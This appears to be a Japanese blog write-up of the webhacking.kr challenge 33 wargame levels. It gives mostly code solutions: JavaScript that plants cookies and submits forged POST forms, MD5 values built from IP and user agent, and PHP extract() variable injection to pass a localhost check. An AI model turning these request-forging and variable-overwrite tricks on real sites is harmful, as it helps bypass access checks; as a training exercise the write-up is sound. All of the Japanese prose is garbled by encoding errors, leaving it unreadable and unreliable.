â– - ãƒ—ãƒã‚°ãƒ©ãƒŸãƒ³ã‚°å¦ç¿’ã‚µã‚¤ãƒˆ

33-1

// ãƒ•ã‚©ãƒ¼ãƒ ã‚’ä½œæˆ
document.body.insertAdjacentHTML("beforeend", `
    <form id="TEST_FORM" action="https://webhacking.kr/challenge/bonus-6/lv2.php" method="post"  >
    ã€€ã€€// ãƒ‘ãƒ©ãƒ¡ãƒ¼ã‚¿
    <input  name="post"  value="hehe"  />
    <input  name="post2"  value="hehe2"  />
    </form>
`)

// ãƒ•ã‚©ãƒ¼ãƒ ã‚’é€ä¿¡
document.getElementById("TEST_FORM").submit()

33-2

GETãƒ‘ãƒ©ãƒ¡ãƒ¼ã‚¿ãƒ¼ã®ã‚ãƒ¼ã‚’myip ã«è¨å®šã€å€¤ã¯ã‚µãƒ¼ãƒãƒ¼ã®REMOTE_ADDRã§ã‚ã‚Œã°å•é¡Œãªã„ã€‚

REMOTE_ADDRã®å€¤ã¯ã€æ¬¡ã®ã‚³ãƒžãƒ³ãƒ‰ã§ç¢ºèªã§ããŸã€‚

$> ping webhacking.kr
PING webhacking.kr (202.182.106.159): 56 data bytes
64 bytes from 202.182.106.159: icmp_seq=0 ttl=52 time=13.164 ms
64 bytes from 202.182.106.159: icmp_seq=1 ttl=52 time=23.832 ms
64 bytes from 202.182.106.159: icmp_seq=2 ttl=52 time=46.848 ms
64 bytes from 202.182.106.159: icmp_seq=3 ttl=52 time=13.757 ms
64 bytes from 202.182.106.159: icmp_seq=4 ttl=52 time=48.526 ms
^C
--- webhacking.kr ping statistics ---
5 packets transmitted, 5 packets received, 0.0% packet loss
round-trip min/avg/max/stddev = 13.164/29.225/48.526/15.552 ms

https://webhacking.kr/challenge/bonus-6/33.php?myip=202.182.106.159

ã“ã‚Œã§æ£è§£ã¨æ€ã£ãŸã‚‰é•ã£ãŸã€‚

REMOTE_ADDRã¯ ãƒ¦ãƒ¼ã‚¶ãƒ¼ãŒã‚¢ã‚¯ã‚»ã‚¹ã—ã¦ã„ã‚‹IPã‚¢ãƒ‰ãƒ¬ã‚¹ã®ã“ã¨ãªã®ã§ã€ https://www.cman.jp/network/support/go_access.cgiã«ã‚¢ã‚¯ã‚»ã‚¹ã—ã€IPã‚¢ãƒ‰ãƒ¬ã‚¹ã‚’å–å¾—ã™ã‚‹ãƒ¬ãƒè‰¯ã„ã€‚

â†‘ã®æ‰‹é †ã§æ£è§£

33-4

https://webhacking.kr/challenge/bonus-6/l4.php?password=b442e80a17388b2cd9e568da7ca315a1

Challenge 33-4
view-source
hint : 1733041724

hintã®å€¤ã¯1ç§’ã”ã¨ã«1ã¤å¢—ãˆã¦ã„ãã€‚UNIXã‚¿ã‚¤ãƒ ã‚¹ã‚¿ãƒ³ãƒ—ã‚’md5ã§æš—å·åŒ–ã—ãŸã‚‚ã®ã‚’ã€passwordã«å…¥ã‚Œã‚Œã°OK

æ™‚é–“ãŒè¿‘ããªã£ãŸæ™‚ã¯ã€å†èªã¿è¾¼ã¿ãƒœã‚¿ãƒ³ã‚’é€£æ‰“ã™ã‚‹ã®ãŒã‚³ãƒ„ã€‚

33-5

<hr>
Challenge 33-5<br>
<a href=md555.txt>view-source</a>
<hr>
<?php
if($_GET['imget'] && $_POST['impost'] && $_COOKIE['imcookie']) echo "<a href=???>Next</a>";
else echo "Wrong";
?>

document.cookie = "imcookie=hello; path=/";
// ãƒ•ã‚©ãƒ¼ãƒ ã‚’ä½œæˆ
document.body.insertAdjacentHTML("beforeend", `
    <form id="TEST_FORM" action="https://webhacking.kr/challenge/bonus-6/md555.php?imget=hello" method="post"  >
    ã€€ã€€// ãƒ‘ãƒ©ãƒ¡ãƒ¼ã‚¿
    <input  name="impost"  value="hello"  />
    </form>
`)

// ãƒ•ã‚©ãƒ¼ãƒ ã‚’é€ä¿¡
document.getElementById("TEST_FORM").submit()

33-6

<hr>
Challenge 33-6<br>
<a href=gpcc.txt>view-source</a>
<hr>
<?php
if($_COOKIE['test'] == md5($_SERVER['REMOTE_ADDR']) && $_POST['kk'] == md5($_SERVER['HTTP_USER_AGENT'])) echo "<a href=???>Next</a>";
else echo "hint : {$_SERVER['HTTP_USER_AGENT']}";
?>

document.cookie = "test=13afe819710c524e52d5ba56fb781972; path=/";
document.body.insertAdjacentHTML("beforeend", `
    <form id="TEST_FORM" action="https://webhacking.kr/challenge/bonus-6/gpcc.php" method="post"  >
    <input  name="kk"  value="0845b309c7b9b957afd9ecf775a4c21f"  />
    </form>
`);

document.getElementById("TEST_FORM").submit();

33-7

https://webhacking.kr/challenge/bonus-6/wtff.php

119.171.161.124

119171161124

<hr>
Challenge 33-7<br>
<a href=wtff.txt>view-source</a>
<hr>
<?php
$_SERVER['REMOTE_ADDR'] = str_replace(".","",$_SERVER['REMOTE_ADDR']);
if($_GET[$_SERVER['REMOTE_ADDR']] == $_SERVER['REMOTE_ADDR']) echo "<a href=???>Next</a>";
else echo "Wrong<br>".$_GET[$_SERVER['REMOTE_ADDR']];
?>

?119171161124=119171161124

document.cookie = "test=13afe819710c524e52d5ba56fb781972; path=/";
document.body.insertAdjacentHTML("beforeend", `
    <form id="TEST_FORM" action="https://webhacking.kr/challenge/bonus-6/gpcc.php" method="post"  >
    <input  name="kk"  value="0845b309c7b9b957afd9ecf775a4c21f"  />
    </form>
`);

document.getElementById("TEST_FORM").submit();

https://webhacking.kr/challenge/bonus-6/ipt.php?119171161124=119171161124

33-8

https://webhacking.kr/challenge/bonus-6/ipt.php

<hr>
Challenge 33-8<br>
<a href=ipt.txt>view-source</a>
<hr>
<?php
extract($_GET);
if(!$_GET['addr']) $addr = $_SERVER['REMOTE_ADDR'];
if($addr == "127.0.0.1") echo "<a href=???>Next</a>";
else echo "Wrong";
?>

https://webhacking.kr/challenge/bonus-6/ipt.php?addr=127.0.0.1

33-9

<hr>
Challenge 33-9<br>
<a href=nextt.txt>view-source</a>
<hr>
<?php
for($i=97;$i<=122;$i=$i+2){
  $answer.=chr($i);
}
if($_GET['ans'] == $answer) echo "<a href=???.php>Next</a>";
else echo "Wrong";
?>

ã“ã‚Œã‚’php online cmdã§å®Ÿè¡Œ

<!DOCTYPE html>
<html>
<body>

<?php
for($i=97;$i<=122;$i=$i+2){
  $answer.=chr($i);
}
echo $answer
?>

</body>
</html>

-> acegikmoqsuwy

33-10

<hr>
Challenge 33-10<br>
<a href=forfor.txt>view-source</a>
<hr>
<?php
$ip = $_SERVER['REMOTE_ADDR'];
for($i=0;$i<=strlen($ip);$i++) $ip=str_replace($i,ord($i),$ip);
$ip=str_replace(".","",$ip);
$ip=substr($ip,0,10);
$answer = $ip*2;
$answer = $ip/2;
$answer = str_replace(".","",$answer);
$f=fopen("answerip/{$answer}_{$ip}.php","w");
fwrite($f,"<?php include \"../../../config.php\"; solve(33); unlink(__FILE__); ?>");
fclose($f);
?>

ã“ã‚Œã‚’ã€php online editorã§å®Ÿè¡Œã€‚

<!DOCTYPE html>
<html>
<body>

<?php



$ip = "119.171.161.124";
for($i=0;$i<=strlen($ip);$i++) $ip=str_replace($i,ord($i),$ip);
$ip=str_replace(".","",$ip);
$ip=substr($ip,0,10);
$answer = $ip*2;
$answer = $ip/2;
$answer = str_replace(".","",$answer);
echo $answer;
echo "<br/>";
echo $ip;

?>

</body>
</html>

27553775535

<hr>
Challenge 33-10<br>
<a href=forfor.txt>view-source</a>
<hr>
<?php
$ip = $_SERVER['REMOTE_ADDR'];
for($i=0;$i<=strlen($ip);$i++) $ip=str_replace($i,ord($i),$ip);
$ip=str_replace(".","",$ip);
$ip=substr($ip,0,10);
$answer = $ip*2;
$answer = $ip/2; #ip = 5510755107
$answer = str_replace(".","",$answer); #answer = 27553775535
$f=fopen("answerip/{$answer}_{$ip}.php","w");
fwrite($f,"<?php include \"../../../config.php\"; solve(33); unlink(__FILE__); ?>");
fclose($f);
?>

answerip/27553775535_5510755107.php

-> æ£è§£ï¼

page:https://minegishirei.hatenablog.com/entry/2024/12/01/184813